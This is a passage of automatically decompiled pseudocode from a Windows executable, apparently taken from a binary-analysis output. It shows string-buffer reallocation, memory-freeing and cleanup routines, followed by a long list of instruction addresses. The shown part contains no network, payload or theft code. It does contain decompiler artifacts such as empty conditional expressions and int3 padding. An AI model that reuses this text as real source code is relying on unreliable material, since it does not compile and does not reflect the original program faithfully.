                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											_push(_t612);
                                                                                      																											_t614 = _t633;
                                                                                      																											_t634 = _t633 - 0xc;
                                                                                      																											_push(_t472);
                                                                                      																											_t474 = _t506;
                                                                                      																											_t507 = 0x7fffffff;
                                                                                      																											_push(_t578);
                                                                                      																											_t580 = _v264;
                                                                                      																											_t539 = _t474[4];
                                                                                      																											_v276 = _t539;
                                                                                      																											_push(_t550);
                                                                                      																											__eflags = 0x7fffffff - _t539 - _t580;
                                                                                      																											if(0x7fffffff - _t539 < _t580) {
                                                                                      																												E00401BD0(_t474, 0x7fffffff, _t539);
                                                                                      																												goto L124;
                                                                                      																											} else {
                                                                                      																												_t550 = _t474[5];
                                                                                      																												_t390 = _t539 + _t580;
                                                                                      																												_v32 = _t390;
                                                                                      																												_t600 = _t390 | 0x0000000f;
                                                                                      																												_v28 = _t550;
                                                                                      																												__eflags = _t600 - 0x7fffffff;
                                                                                      																												if(_t600 <= 0x7fffffff) {
                                                                                      																													_t392 = _t550 >> 1;
                                                                                      																													_t507 = 0x7fffffff - _t392;
                                                                                      																													__eflags = _t550 - _t507;
                                                                                      																													if(_t550 <= _t507) {
                                                                                      																														_t393 = _t392 + _t550;
                                                                                      																														__eflags = _t600 - _t393;
                                                                                      																														_t580 =  <  ? _t393 : _t600;
                                                                                      																														_t182 = _t580 + 1; // 0x80000000
                                                                                      																														_t507 = _t182;
                                                                                      																														__eflags = _t507 - 0x1000;
                                                                                      																														if(_t507 < 0x1000) {
                                                                                      																															__eflags = _t507;
                                                                                      																															if(__eflags == 0) {
                                                                                      																																_t550 = 0;
                                                                                      																																__eflags = 0;
                                                                                      																															} else {
                                                                                      																																_t402 = E0041362C(_t474, _t550, _t580, __eflags, _t507);
                                                                                      																																_t539 = _v24;
                                                                                      																																_t634 = _t634 + 4;
                                                                                      																																_t550 = _t402;
                                                                                      																															}
                                                                                      																															goto L117;
                                                                                      																														} else {
                                                                                      																															_t183 = _t507 + 0x23; // 0x80000023
                                                                                      																															_t403 = _t183;
                                                                                      																															__eflags = _t183 - _t507;
                                                                                      																															if(__eflags <= 0) {
                                                                                      																																L124:
                                                                                      																																E00401B30();
                                                                                      																																goto L125;
                                                                                      																															} else {
                                                                                      																																goto L107;
                                                                                      																															}
                                                                                      																														}
                                                                                      																													} else {
                                                                                      																														_t580 = 0x7fffffff;
                                                                                      																														goto L106;
                                                                                      																													}
                                                                                      																												} else {
                                                                                      																													_t580 = 0x7fffffff;
                                                                                      																													L106:
                                                                                      																													_t403 = 0xffffffff80000023;
                                                                                      																													__eflags = 0x80000000;
                                                                                      																													L107:
                                                                                      																													_t404 = E0041362C(_t474, _t550, _t580, __eflags, _t403);
                                                                                      																													_t634 = _t634 + 4;
                                                                                      																													__eflags = _t404;
                                                                                      																													if(_t404 == 0) {
                                                                                      																														L125:
                                                                                      																														E0041805F(_t474, _t507, _t539);
                                                                                      																														asm("int3");
                                                                                      																														asm("int3");
                                                                                      																														asm("int3");
                                                                                      																														asm("int3");
                                                                                      																														_push(_t614);
                                                                                      																														_t615 = _t634;
                                                                                      																														_t635 = _t634 - 0x14;
                                                                                      																														_push(_t474);
                                                                                      																														_t475 = _t507;
                                                                                      																														_t508 = 0x7fffffff;
                                                                                      																														_push(_t580);
                                                                                      																														_t581 = _v288;
                                                                                      																														_t540 = _t475[4];
                                                                                      																														_v300 = _t540;
                                                                                      																														_push(_t550);
                                                                                      																														__eflags = 0x7fffffff - _t540 - _t581;
                                                                                      																														if(0x7fffffff - _t540 < _t581) {
                                                                                      																															E00401BD0(_t475, 0x7fffffff, _t540);
                                                                                      																															goto L147;
                                                                                      																														} else {
                                                                                      																															_t550 = _t475[5];
                                                                                      																															_t367 = _t540 + _t581;
                                                                                      																															_v32 = _t367;
                                                                                      																															_t594 = _t367 | 0x0000000f;
                                                                                      																															_v36 = _t550;
                                                                                      																															__eflags = _t594 - 0x7fffffff;
                                                                                      																															if(_t594 <= 0x7fffffff) {
                                                                                      																																_t369 = _t550 >> 1;
                                                                                      																																_t508 = 0x7fffffff - _t369;
                                                                                      																																__eflags = _t550 - _t508;
                                                                                      																																if(_t550 <= _t508) {
                                                                                      																																	_t370 = _t369 + _t550;
                                                                                      																																	__eflags = _t594 - _t370;
                                                                                      																																	_t581 =  <  ? _t370 : _t594;
                                                                                      																																	_t212 = _t581 + 1; // 0x80000000
                                                                                      																																	_t508 = _t212;
                                                                                      																																	__eflags = _t508 - 0x1000;
                                                                                      																																	if(_t508 < 0x1000) {
                                                                                      																																		__eflags = _t508;
                                                                                      																																		if(__eflags == 0) {
                                                                                      																																			_t550 = 0;
                                                                                      																																			__eflags = 0;
                                                                                      																																		} else {
                                                                                      																																			_t386 = E0041362C(_t475, _t550, _t581, __eflags, _t508);
                                                                                      																																			_t540 = _v28;
                                                                                      																																			_t635 = _t635 + 4;
                                                                                      																																			_t550 = _t386;
                                                                                      																																		}
                                                                                      																																		goto L140;
                                                                                      																																	} else {
                                                                                      																																		_t213 = _t508 + 0x23; // 0x80000023
                                                                                      																																		_t387 = _t213;
                                                                                      																																		__eflags = _t213 - _t508;
                                                                                      																																		if(__eflags <= 0) {
                                                                                      																																			L147:
                                                                                      																																			E00401B30();
                                                                                      																																			goto L148;
                                                                                      																																		} else {
                                                                                      																																			goto L130;
                                                                                      																																		}
                                                                                      																																	}
                                                                                      																																} else {
                                                                                      																																	_t581 = 0x7fffffff;
                                                                                      																																	goto L129;
                                                                                      																																}
                                                                                      																															} else {
                                                                                      																																_t581 = 0x7fffffff;
                                                                                      																																L129:
                                                                                      																																_t387 = 0xffffffff80000023;
                                                                                      																																__eflags = 0x80000000;
                                                                                      																																L130:
                                                                                      																																_t388 = E0041362C(_t475, _t550, _t581, __eflags, _t387);
                                                                                      																																_t635 = _t635 + 4;
                                                                                      																																__eflags = _t388;
                                                                                      																																if(_t388 == 0) {
                                                                                      																																	L148:
                                                                                      																																	E0041805F(_t475, _t508, _t540);
                                                                                      																																	asm("int3");
                                                                                      																																	asm("int3");
                                                                                      																																	asm("int3");
                                                                                      																																	asm("int3");
                                                                                      																																	_push(_t615);
                                                                                      																																	_t606 = _t635;
                                                                                      																																	_t625 = _t635 - 0x10;
                                                                                      																																	_push(_t475);
                                                                                      																																	_t466 = _t508;
                                                                                      																																	_t509 = 0x7fffffff;
                                                                                      																																	_push(_t581);
                                                                                      																																	_t570 = _v320;
                                                                                      																																	_t541 = _t466[4];
                                                                                      																																	_v332 = _t541;
                                                                                      																																	_push(_t550);
                                                                                      																																	__eflags = 0x7fffffff - _t541 - _t570;
                                                                                      																																	if(0x7fffffff - _t541 < _t570) {
                                                                                      																																		E00401BD0(_t466, 0x7fffffff, _t541);
                                                                                      																																		goto L170;
                                                                                      																																	} else {
                                                                                      																																		_t550 = _t466[5];
                                                                                      																																		_t345 = _t541 + _t570;
                                                                                      																																		_v36 = _t345;
                                                                                      																																		_t588 = _t345 | 0x0000000f;
                                                                                      																																		_v40 = _t550;
                                                                                      																																		__eflags = _t588 - 0x7fffffff;
                                                                                      																																		if(_t588 <= 0x7fffffff) {
                                                                                      																																			_t347 = _t550 >> 1;
                                                                                      																																			_t509 = 0x7fffffff - _t347;
                                                                                      																																			__eflags = _t550 - _t509;
                                                                                      																																			if(_t550 <= _t509) {
                                                                                      																																				_t348 = _t347 + _t550;
                                                                                      																																				__eflags = _t588 - _t348;
                                                                                      																																				_t570 =  <  ? _t348 : _t588;
                                                                                      																																				_t252 = _t570 + 1; // 0x80000000
                                                                                      																																				_t509 = _t252;
                                                                                      																																				__eflags = _t509 - 0x1000;
                                                                                      																																				if(_t509 < 0x1000) {
                                                                                      																																					__eflags = _t509;
                                                                                      																																					if(__eflags == 0) {
                                                                                      																																						_t550 = 0;
                                                                                      																																						__eflags = 0;
                                                                                      																																					} else {
                                                                                      																																						_t363 = E0041362C(_t466, _t550, _t570, __eflags, _t509);
                                                                                      																																						_t541 = _v32;
                                                                                      																																						_t625 = _t625 + 4;
                                                                                      																																						_t550 = _t363;
                                                                                      																																					}
                                                                                      																																					goto L163;
                                                                                      																																				} else {
                                                                                      																																					_t253 = _t509 + 0x23; // 0x80000023
                                                                                      																																					_t364 = _t253;
                                                                                      																																					__eflags = _t253 - _t509;
                                                                                      																																					if(__eflags <= 0) {
                                                                                      																																						L170:
                                                                                      																																						E00401B30();
                                                                                      																																						goto L171;
                                                                                      																																					} else {
                                                                                      																																						goto L153;
                                                                                      																																					}
                                                                                      																																				}
                                                                                      																																			} else {
                                                                                      																																				_t570 = 0x7fffffff;
                                                                                      																																				goto L152;
                                                                                      																																			}
                                                                                      																																		} else {
                                                                                      																																			_t570 = 0x7fffffff;
                                                                                      																																			L152:
                                                                                      																																			_t364 = 0xffffffff80000023;
                                                                                      																																			__eflags = 0x80000000;
                                                                                      																																			L153:
                                                                                      																																			_t365 = E0041362C(_t466, _t550, _t570, __eflags, _t364);
                                                                                      																																			_t625 = _t625 + 4;
                                                                                      																																			__eflags = _t365;
                                                                                      																																			if(_t365 == 0) {
                                                                                      																																				L171:
                                                                                      																																				_t280 = E0041805F(_t466, _t509, _t541);
                                                                                      																																				asm("int3");
                                                                                      																																				asm("int3");
                                                                                      																																				asm("int3");
                                                                                      																																				asm("int3");
                                                                                      																																				asm("int3");
                                                                                      																																				_t482 =  *_t509;
                                                                                      																																				__eflags = _t482;
                                                                                      																																				if(_t482 != 0) {
                                                                                      																																					_push(_t550);
                                                                                      																																					_t559 = _t482;
                                                                                      																																					_t510 =  *_t559;
                                                                                      																																					if(_t510 == 0) {
                                                                                      																																						L6:
                                                                                      																																						return _t280;
                                                                                      																																					} else {
                                                                                      																																						_push(_t570);
                                                                                      																																						_push(_t510);
                                                                                      																																						L93();
                                                                                      																																						_t582 =  *_t559;
                                                                                      																																						_t514 = (0x2aaaaaab * ( *(_t559 + 8) - _t582) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t559 + 8) - _t582) >> 0x20 >> 2) + ((0x2aaaaaab * ( *(_t559 + 8) - _t582) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t559 + 8) - _t582) >> 0x20 >> 2)) * 2 << 3;
                                                                                      																																						if(_t514 < 0x1000) {
                                                                                      																																							L5:
                                                                                      																																							_push(_t514);
                                                                                      																																							_t280 = E004138AD(_t582);
                                                                                      																																							 *_t559 = 0;
                                                                                      																																							 *(_t559 + 4) = 0;
                                                                                      																																							 *(_t559 + 8) = 0;
                                                                                      																																							goto L6;
                                                                                      																																						} else {
                                                                                      																																							_t545 =  *((intOrPtr*)(_t582 - 4));
                                                                                      																																							_t514 = _t514 + 0x23;
                                                                                      																																							_t584 = _t582 - _t545;
                                                                                      																																							if(_t584 - 4 > 0x1f) {
                                                                                      																																								E0041805F(_t466, _t514, _t545);
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								asm("int3");
                                                                                      																																								_push(_t606);
                                                                                      																																								__eflags = _v356 & 0x00000001;
                                                                                      																																								_push(_t584);
                                                                                      																																								_t585 = _t514;
                                                                                      																																								 *_t585 = 0x4337e4;
                                                                                      																																								if((_v356 & 0x00000001) != 0) {
                                                                                      																																									_push(8);
                                                                                      																																									E004138AD(_t585);
                                                                                      																																								}
                                                                                      																																								return _t585;
                                                                                      																																							} else {
                                                                                      																																								_t582 = _t545;
                                                                                      																																								goto L5;
                                                                                      																																							}
                                                                                      																																						}
                                                                                      																																					}
                                                                                      																																				} else {
                                                                                      																																					return _t280;
                                                                                      																																				}
                                                                                      																																			} else {
                                                                                      																																				_t541 = _v32;
                                                                                      																																				_t250 = _t365 + 0x23; // 0x23
                                                                                      																																				_t550 = _t250 & 0xffffffe0;
                                                                                      																																				 *(_t550 - 4) = _t365;
                                                                                      																																				L163:
                                                                                      																																				_t466[4] = _v36;
                                                                                      																																				_v32 = _v8;
                                                                                      																																				_t466[5] = _t570;
                                                                                      																																				_t589 = _t550 + _t541;
                                                                                      																																				_v44 = _t589;
                                                                                      																																				__eflags = _v40 - 0x10;
                                                                                      																																				_v36 = _v12 + _t589;
                                                                                      																																				_push(_t541);
                                                                                      																																				if(_v40 < 0x10) {
                                                                                      																																					_push(_t466);
                                                                                      																																					_push(_t550);
                                                                                      																																					E00414BF0();
                                                                                      																																					E00415180(_t550, _t589, _v32, _v12);
                                                                                      																																					 *_v36 = 0;
                                                                                      																																					 *_t466 = _t550;
                                                                                      																																					return _t466;
                                                                                      																																				} else {
                                                                                      																																					_t591 =  *_t466;
                                                                                      																																					_push(_t591);
                                                                                      																																					_push(_t550);
                                                                                      																																					E00414BF0();
                                                                                      																																					E00415180(_t550, _v44, _v32, _v12);
                                                                                      																																					_t625 = _t625 + 0x18;
                                                                                      																																					_t516 = _v40 + 1;
                                                                                      																																					 *_v36 = 0;
                                                                                      																																					__eflags = _t516 - 0x1000;
                                                                                      																																					if(_t516 < 0x1000) {
                                                                                      																																						L167:
                                                                                      																																						_push(_t516);
                                                                                      																																						E004138AD(_t591);
                                                                                      																																						 *_t466 = _t550;
                                                                                      																																						return _t466;
                                                                                      																																					} else {
                                                                                      																																						_t541 =  *(_t591 - 4);
                                                                                      																																						_t509 = _t516 + 0x23;
                                                                                      																																						_t570 = _t591 - _t541;
                                                                                      																																						_t271 = _t570 - 4; // 0x7ffffffb
                                                                                      																																						__eflags = _t271 - 0x1f;
                                                                                      																																						if(_t271 > 0x1f) {
                                                                                      																																							goto L171;
                                                                                      																																						} else {
                                                                                      																																							_t591 = _t541;
                                                                                      																																							goto L167;
                                                                                      																																						}
                                                                                      																																					}
                                                                                      																																				}
                                                                                      																																			}
                                                                                      																																		}
                                                                                      																																	}
                                                                                      																																} else {
                                                                                      																																	_t540 = _v28;
                                                                                      																																	_t210 = _t388 + 0x23; // 0x23
                                                                                      																																	_t550 = _t210 & 0xffffffe0;
                                                                                      																																	 *(_t550 - 4) = _t388;
                                                                                      																																	L140:
                                                                                      																																	_t475[4] = _v32;
                                                                                      																																	_v28 = _v0;
                                                                                      																																	_t373 = _v8;
                                                                                      																																	_t475[5] = _t581;
                                                                                      																																	_push(_t373);
                                                                                      																																	_v40 = _t540 - _t373 + 1;
                                                                                      																																	_t595 = _t550 + _t373;
                                                                                      																																	_v44 = _t595;
                                                                                      																																	__eflags = _v36 - 0x10;
                                                                                      																																	_v32 = _v4 + _t595;
                                                                                      																																	if(_v36 < 0x10) {
                                                                                      																																		_push(_t475);
                                                                                      																																		_push(_t550);
                                                                                      																																		E00414BF0();
                                                                                      																																		E00415180(_t550, _t595, _v28, _v4);
                                                                                      																																		__eflags = _t475 + _v8;
                                                                                      																																		E00414BF0(_v32, _t475 + _v8, _v40);
                                                                                      																																		 *_t475 = _t550;
                                                                                      																																		return _t475;
                                                                                      																																	} else {
                                                                                      																																		_t597 =  *_t475;
                                                                                      																																		_push(_t597);
                                                                                      																																		_push(_t550);
                                                                                      																																		E00414BF0();
                                                                                      																																		E00415180(_t550, _v44, _v28, _v4);
                                                                                      																																		E00414BF0(_v32, _v8 + _t597, _v40);
                                                                                      																																		_t635 = _t635 + 0x24;
                                                                                      																																		_t523 = _v36 + 1;
                                                                                      																																		__eflags = _t523 - 0x1000;
                                                                                      																																		if(_t523 < 0x1000) {
                                                                                      																																			L144:
                                                                                      																																			_push(_t523);
                                                                                      																																			E004138AD(_t597);
                                                                                      																																			 *_t475 = _t550;
                                                                                      																																			return _t475;
                                                                                      																																		} else {
                                                                                      																																			_t540 =  *(_t597 - 4);
                                                                                      																																			_t508 = _t523 + 0x23;
                                                                                      																																			_t581 = _t597 - _t540;
                                                                                      																																			_t236 = _t581 - 4; // 0x7ffffffb
                                                                                      																																			__eflags = _t236 - 0x1f;
                                                                                      																																			if(_t236 > 0x1f) {
                                                                                      																																				goto L148;
                                                                                      																																			} else {
                                                                                      																																				_t597 = _t540;
                                                                                      																																				goto L144;
                                                                                      																																			}
                                                                                      																																		}
                                                                                      																																	}
                                                                                      																																}
                                                                                      																															}
                                                                                      																														}
                                                                                      																													} else {
                                                                                      																														_t539 = _v24;
                                                                                      																														_t180 = _t404 + 0x23; // 0x23
                                                                                      																														_t550 = _t180 & 0xffffffe0;
                                                                                      																														 *(_t550 - 4) = _t404;
                                                                                      																														L117:
                                                                                      																														__eflags = _v28 - 0x10;
                                                                                      																														_t474[4] = _v32;
                                                                                      																														_t474[5] = _t580;
                                                                                      																														_push(_t539);
                                                                                      																														if(_v28 < 0x10) {
                                                                                      																															_push(_t474);
                                                                                      																															_push(_t550);
                                                                                      																															E00414BF0();
                                                                                      																															_t547 = _v24;
                                                                                      																															 *((char*)(_t550 + _t547)) = _v4;
                                                                                      																															 *((char*)(_t550 + _t547 + 1)) = 0;
                                                                                      																															 *_t474 = _t550;
                                                                                      																															return _t474;
                                                                                      																														} else {
                                                                                      																															_t602 =  *_t474;
                                                                                      																															_push(_t602);
                                                                                      																															_push(_t550);
                                                                                      																															E00414BF0();
                                                                                      																															_t548 = _v24;
                                                                                      																															_t634 = _t634 + 0xc;
                                                                                      																															_t526 = _v28 + 1;
                                                                                      																															 *((char*)(_t550 + _t548)) = _v4;
                                                                                      																															 *((char*)(_t550 + _t548 + 1)) = 0;
                                                                                      																															__eflags = _t526 - 0x1000;
                                                                                      																															if(_t526 < 0x1000) {
                                                                                      																																L121:
                                                                                      																																_push(_t526);
                                                                                      																																E004138AD(_t602);
                                                                                      																																 *_t474 = _t550;
                                                                                      																																return _t474;
                                                                                      																															} else {
                                                                                      																																_t539 =  *(_t602 - 4);
                                                                                      																																_t507 = _t526 + 0x23;
                                                                                      																																_t580 = _t602 - _t539;
                                                                                      																																_t196 = _t580 - 4; // 0x7ffffffb
                                                                                      																																__eflags = _t196 - 0x1f;
                                                                                      																																if(_t196 > 0x1f) {
                                                                                      																																	goto L125;
                                                                                      																																} else {
                                                                                      																																	_t602 = _t539;
                                                                                      																																	goto L121;
                                                                                      																																}
                                                                                      																															}
                                                                                      																														}
                                                                                      																													}
                                                                                      																												}
                                                                                      																											}
                                                                                      																										} else {
                                                                                      																											_t318 = _t538;
                                                                                      																											goto L99;
                                                                                      																										}
                                                                                      																									}
                                                                                      																								}
                                                                                      																								goto L174;
                                                                                      																								L100:
                                                                                      																								 *(_t578 + 0x10) = 0;
                                                                                      																								 *((intOrPtr*)(_t578 + 0x14)) = 0xf;
                                                                                      																								 *_t578 = 0;
                                                                                      																								_t578 = _t578 + 0x18;
                                                                                      																								__eflags = _t578 - _t550;
                                                                                      																							} while (_t578 != _t550);
                                                                                      																							goto L101;
                                                                                      																						}
                                                                                      																					} else {
                                                                                      																						_t576 = _v44;
                                                                                      																						_v36 = _t576;
                                                                                      																						_v16 = 1;
                                                                                      																						E0041262E(__eflags, _t576);
                                                                                      																						_t537 =  *_t576;
                                                                                      																						 *((intOrPtr*)( *_t576 + 4))();
                                                                                      																						 *0x444f40 = _t576;
                                                                                      																						goto L91;
                                                                                      																					}
                                                                                      																				} else {
                                                                                      																					_t576 = _t472;
                                                                                      																					goto L91;
                                                                                      																				}
                                                                                      																			} else {
                                                                                      																				_t576 =  *(_v32 +  *((intOrPtr*)(_t408 + 8)));
                                                                                      																				goto L86;
                                                                                      																			}
                                                                                      																		}
                                                                                      																	}
                                                                                      																}
                                                                                      															} else {
                                                                                      																E00412760( &_v92,  &_v92, _t555);
                                                                                      																 *(_t573 + 4) = 0;
                                                                                      																 *_t573 = 0x434418;
                                                                                      																_v12 = 9;
                                                                                      																E004127AB( &_v92,  &_v92);
                                                                                      																_t419 = _v48;
                                                                                      																_t652 = _t630 + 0xc;
                                                                                      																__eflags = _t419;
                                                                                      																if(_t419 != 0) {
                                                                                      																	E0041AC1E(_t419);
                                                                                      																	_t652 = _t652 + 4;
                                                                                      																}
                                                                                      																_t420 = _v56;
                                                                                      																_v48 = 0;
                                                                                      																__eflags = _t420;
                                                                                      																if(_t420 != 0) {
                                                                                      																	E0041AC1E(_t420);
                                                                                      																	_t652 = _t652 + 4;
                                                                                      																}
                                                                                      																_t421 = _v64;
                                                                                      																_v56 = 0;
                                                                                      																__eflags = _t421;
                                                                                      																if(_t421 != 0) {
                                                                                      																	E0041AC1E(_t421);
                                                                                      																	_t652 = _t652 + 4;
                                                                                      																}
                                                                                      																_t422 = _v72;
                                                                                      																_v64 = 0;
                                                                                      																__eflags = _t422;
                                                                                      																if(_t422 != 0) {
                                                                                      																	E0041AC1E(_t422);
                                                                                      																	_t652 = _t652 + 4;
                                                                                      																}
                                                                                      																_t423 = _v80;
                                                                                      																_v72 = 0;
                                                                                      																__eflags = _t423;
                                                                                      																if(_t423 != 0) {
                                                                                      																	E0041AC1E(_t423);
                                                                                      																	_t652 = _t652 + 4;
                                                                                      																}
                                                                                      																_t424 = _v88;
                                                                                      																_v80 = 0;
                                                                                      																__eflags = _t424;
                                                                                      																if(_t424 != 0) {
                                                                                      																	E0041AC1E(_t424);
                                                                                      																	_t652 = _t652 + 4;
                                                                                      																}
                                                                                      																_v88 = 0;
                                                                                      																E004124D5( &_v92);
                                                                                      																_v28 = _t573;
                                                                                      																_v12 = 0xa;
                                                                                      																E0041262E(__eflags, _t573);
                                                                                      																 *((intOrPtr*)( *_t573 + 4))();
                                                                                      																 *0x444f44 = _t573;
                                                                                      																goto L48;
                                                                                      															}
                                                                                      														} else {
                                                                                      															_t573 = _t300;
                                                                                      															goto L48;
                                                                                      														}
                                                                                      													} else {
                                                                                      														_t573 =  *(_t470 +  *((intOrPtr*)(_t435 + 8)));
                                                                                      														goto L53;
                                                                                      													}
                                                                                      												}
                                                                                      											} else {
                                                                                      												L48:
                                                                                      												E004124D5( &_v32);
                                                                                      												 *[fs:0x0] = _v20;
                                                                                      												_pop(_t554);
                                                                                      												_pop(_t574);
                                                                                      												_pop(_t471);
                                                                                      												__eflags = _v24 ^ _t608;
                                                                                      												return E0041361E(_t573, _t471, _v24 ^ _t608, _t536, _t554, _t574);
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										E00412760( &_v88,  &_v88, _t552);
                                                                                      										 *(_t571 + 4) = 0;
                                                                                      										 *_t571 = 0x43446c;
                                                                                      										_v8 = 9;
                                                                                      										E004127AB( &_v88,  &_v88);
                                                                                      										_t446 = _v44;
                                                                                      										_t654 = _t627 + 0xc;
                                                                                      										__eflags = _t446;
                                                                                      										if(_t446 != 0) {
                                                                                      											E0041AC1E(_t446);
                                                                                      											_t654 = _t654 + 4;
                                                                                      										}
                                                                                      										_t447 = _v52;
                                                                                      										_v44 = 0;
                                                                                      										__eflags = _t447;
                                                                                      										if(_t447 != 0) {
                                                                                      											E0041AC1E(_t447);
                                                                                      											_t654 = _t654 + 4;
                                                                                      										}
                                                                                      										_t448 = _v60;
                                                                                      										_v52 = 0;
                                                                                      										__eflags = _t448;
                                                                                      										if(_t448 != 0) {
                                                                                      											E0041AC1E(_t448);
                                                                                      											_t654 = _t654 + 4;
                                                                                      										}
                                                                                      										_t449 = _v68;
                                                                                      										_v60 = 0;
                                                                                      										__eflags = _t449;
                                                                                      										if(_t449 != 0) {
                                                                                      											E0041AC1E(_t449);
                                                                                      											_t654 = _t654 + 4;
                                                                                      										}
                                                                                      										_t450 = _v76;
                                                                                      										_v68 = 0;
                                                                                      										__eflags = _t450;
                                                                                      										if(_t450 != 0) {
                                                                                      											E0041AC1E(_t450);
                                                                                      											_t654 = _t654 + 4;
                                                                                      										}
                                                                                      										_t451 = _v84;
                                                                                      										_v76 = 0;
                                                                                      										__eflags = _t451;
                                                                                      										if(_t451 != 0) {
                                                                                      											E0041AC1E(_t451);
                                                                                      											_t654 = _t654 + 4;
                                                                                      										}
                                                                                      										_v84 = 0;
                                                                                      										E004124D5( &_v88);
                                                                                      										_v24 = _t571;
                                                                                      										_v8 = 0xa;
                                                                                      										E0041262E(__eflags, _t571);
                                                                                      										 *((intOrPtr*)( *_t571 + 4))();
                                                                                      										 *0x444f4c = _t571;
                                                                                      										goto L15;
                                                                                      									}
                                                                                      								} else {
                                                                                      									_t571 = _t284;
                                                                                      									goto L15;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t571 =  *(_t467 +  *((intOrPtr*)(_t462 + 8)));
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						L15:
                                                                                      						E004124D5( &_v28);
                                                                                      						 *[fs:0x0] = _v16;
                                                                                      						_pop(_t551);
                                                                                      						_pop(_t572);
                                                                                      						_pop(_t468);
                                                                                      						__eflags = _v20 ^ _t606;
                                                                                      						return E0041361E(_t571, _t468, _v20 ^ _t606, _t536, _t551, _t572);
                                                                                      					}
                                                                                      				}
                                                                                      				L174:
                                                                                      			}













































































































































































                                                                                      0x00408400
                                                                                      0x00408400
                                                                                      0x00408401
                                                                                      0x00408403
                                                                                      0x00408405
                                                                                      0x00408410
                                                                                      0x00408411
                                                                                      0x00408414
                                                                                      0x00408419
                                                                                      0x0040841b
                                                                                      0x0040841e
                                                                                      0x0040841f
                                                                                      0x00408420
                                                                                      0x00408421
                                                                                      0x00408425
                                                                                      0x0040842b
                                                                                      0x0040842b
                                                                                      0x0040842e
                                                                                      0x00408433
                                                                                      0x00408436
                                                                                      0x0040843b
                                                                                      0x00408442
                                                                                      0x00408448
                                                                                      0x0040844d
                                                                                      0x00408452
                                                                                      0x00408455
                                                                                      0x00408458
                                                                                      0x0040845d
                                                                                      0x00408463
                                                                                      0x00408465
                                                                                      0x0040846a
                                                                                      0x0040846a
                                                                                      0x0040846b
                                                                                      0x00408470
                                                                                      0x00408470
                                                                                      0x00408475
                                                                                      0x00408478
                                                                                      0x0040847d
                                                                                      0x0040847d
                                                                                      0x00408483
                                                                                      0x00408486
                                                                                      0x0040848d
                                                                                      0x00408490
                                                                                      0x004084c2
                                                                                      0x004084c2
                                                                                      0x00000000
                                                                                      0x00408492
                                                                                      0x00408495
                                                                                      0x00408498
                                                                                      0x0040849a
                                                                                      0x004084c4
                                                                                      0x004084c4
                                                                                      0x004084c8
                                                                                      0x004084da
                                                                                      0x004084da
                                                                                      0x004084dc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004084ca
                                                                                      0x004084ca
                                                                                      0x004084cf
                                                                                      0x004084d2
                                                                                      0x004084de
                                                                                      0x004084de
                                                                                      0x004084e1
                                                                                      0x004084e3
                                                                                      0x004084f0
                                                                                      0x004084f2
                                                                                      0x004084f5
                                                                                      0x004084fb
                                                                                      0x004084fb
                                                                                      0x004084fe
                                                                                      0x00408500
                                                                                      0x0040850e
                                                                                      0x00408502
                                                                                      0x00408502
                                                                                      0x00408505
                                                                                      0x00408507
                                                                                      0x00408509
                                                                                      0x00408509
                                                                                      0x00408509
                                                                                      0x00408507
                                                                                      0x00408518
                                                                                      0x0040851d
                                                                                      0x00408524
                                                                                      0x00408528
                                                                                      0x0040852f
                                                                                      0x00408535
                                                                                      0x0040853c
                                                                                      0x00408540
                                                                                      0x00408543
                                                                                      0x00408547
                                                                                      0x0040854a
                                                                                      0x0040854d
                                                                                      0x00408550
                                                                                      0x00408553
                                                                                      0x00408557
                                                                                      0x00408559
                                                                                      0x0040863f
                                                                                      0x00408644
                                                                                      0x00408645
                                                                                      0x00408646
                                                                                      0x00408647
                                                                                      0x00408648
                                                                                      0x00408649
                                                                                      0x0040864a
                                                                                      0x0040864b
                                                                                      0x0040864c
                                                                                      0x0040864d
                                                                                      0x0040864e
                                                                                      0x0040864f
                                                                                      0x00408650
                                                                                      0x00408651
                                                                                      0x00408653
                                                                                      0x00408655
                                                                                      0x00408660
                                                                                      0x00408661
                                                                                      0x00408664
                                                                                      0x00408669
                                                                                      0x0040866b
                                                                                      0x0040866e
                                                                                      0x0040866f
                                                                                      0x00408670
                                                                                      0x00408671
                                                                                      0x00408675
                                                                                      0x0040867b
                                                                                      0x00408683
                                                                                      0x00408686
                                                                                      0x0040868b
                                                                                      0x00408692
                                                                                      0x00408698
                                                                                      0x0040869d
                                                                                      0x004086a0
                                                                                      0x004086a2
                                                                                      0x004086a8
                                                                                      0x004086ad
                                                                                      0x004086b3
                                                                                      0x004086b5
                                                                                      0x004086ba
                                                                                      0x004086ba
                                                                                      0x004086bb
                                                                                      0x004086c0
                                                                                      0x004086c0
                                                                                      0x004086c8
                                                                                      0x004086cd
                                                                                      0x004086cd
                                                                                      0x004086d3
                                                                                      0x004086d3
                                                                                      0x004086d6
                                                                                      0x004086dd
                                                                                      0x004086e0
                                                                                      0x00408712
                                                                                      0x00408712
                                                                                      0x00000000
                                                                                      0x004086e2
                                                                                      0x004086e5
                                                                                      0x004086e8
                                                                                      0x004086ea
                                                                                      0x00408714
                                                                                      0x00408714
                                                                                      0x00408718
                                                                                      0x0040872a
                                                                                      0x0040872a
                                                                                      0x0040872c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040871a
                                                                                      0x0040871a
                                                                                      0x0040871f
                                                                                      0x00408722
                                                                                      0x0040872e
                                                                                      0x0040872e
                                                                                      0x00408731
                                                                                      0x00408733
                                                                                      0x00408740
                                                                                      0x00408742
                                                                                      0x00408745
                                                                                      0x0040874b
                                                                                      0x0040874b
                                                                                      0x0040874e
                                                                                      0x00408750
                                                                                      0x0040875e
                                                                                      0x00408752
                                                                                      0x00408752
                                                                                      0x00408755
                                                                                      0x00408757
                                                                                      0x00408759
                                                                                      0x00408759
                                                                                      0x00408759
